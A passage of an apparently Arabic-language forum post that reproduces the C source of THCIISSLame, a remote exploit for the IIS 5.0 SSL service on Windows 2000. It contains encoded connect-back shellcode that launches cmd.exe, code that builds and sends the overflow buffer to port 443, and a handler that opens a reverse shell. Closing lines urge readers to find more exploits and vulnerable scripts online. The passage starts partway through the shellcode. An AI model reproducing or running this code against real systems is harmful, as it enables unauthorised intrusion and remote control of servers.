"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\x 55\x57\xff"
"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\x 55\xec\x8d"
"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\x 63\x6d\x64"
"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\x fe\xca\x01"
"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\x 08\x53\x53"
"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x 6a\xff\xff"
"\x55\xe4";
void usage();
void shell(int sock);
int main(int argc, char *argv[])
{
unsigned int i,sock,sock2,sock3,addr,rc,len=16;
unsigned char *badbuf,*p;
unsigned long offset = 0x6741a1cd;
unsigned long XOR = 0xffffffff;
unsigned long XORIP = 0x93939393;
unsigned short XORPORT = 0x9393;
unsigned short cbport;
unsigned long cbip;
struct sockaddr_in mytcp;
struct hostent * hp;
WSADATA wsaData;
printf("\nTHCIISSLame v0.3 - IIS 5.0 SSL remote root exploit\n");
printf("tested on Windows 2000 Server german/english SP4\n");
printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");
if(argc<4 || argc>4)
usage();
badbuf = malloc(352);
memset(badbuf,0,352);
printf("\n building buffer\n");
p = badbuf;
memcpy(p,sslshit,sizeof(sslshit));
p+=sizeof(sslshit)-1;
strcat(p,jumper);
strcat(p,greetings_to_microsoft);
offset^=XOR;
strncat(p,(unsigned char *)&offset,4);
cbport = htons((unsigned short)atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);
strcat(p,shellcode);
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
printf("socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr = addr;
if (hp)
mytcp.sin_family = hp->h_addrtype;
else
mytcp.sin_family = AF_INET;
mytcp.sin_port=htons(443);
printf(" connecting the target\n");
rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0)
{
send(sock,badbuf,351,0);
printf(" exploit send\n");
mytcp.sin_addr.s_addr = 0;
mytcp.sin_port=htons((unsigned short)atoi(argv[3]));
sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
rc=bind(sock2,(struct sockaddr *)&mytcp,16);
if(rc!=0)
{
printf("bind error() %d\n",WSAGetLastError());
exit(-1);
}
rc=listen(sock2,1);
if(rc!=0)
{
printf("listen error()\n");
exit(-1);
}
printf(" waiting for shell\n");
sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len);
if(sock3)
{
printf(" Exploit successful ! Have fun !\n");
printf(" --------------------------------------------------------------------\n\n");
shell(sock3);
}
}
else
{
printf("\nCan't connect to ssl port 443!\n");
exit(-1);
}
shutdown(sock,1);
closesocket(sock);
shutdown(sock,2);
closesocket(sock2);
shutdown(sock,3);
closesocket(sock3);
free(badbuf);
exit(0);
}
void usage()
{
unsigned int a;
printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n");
printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337\n\n");
exit(0);
}
void shell(int sock)
{
int l;
char buf[1024];
struct timeval time;
unsigned long ul[2];
time.tv_sec = 1;
time.tv_usec = 0;
while (1)
{
ul[0] = 1;
ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("bye bye...\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("bye bye...\n");
return;
}
}
}
}
وباقي الاستغلالات ابحثو عنها في موقع السكيوريتي
اما السكربتات المصابة فإبحثو في bing
Powered by vBulletin® Version 4.2.6 by vBS Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.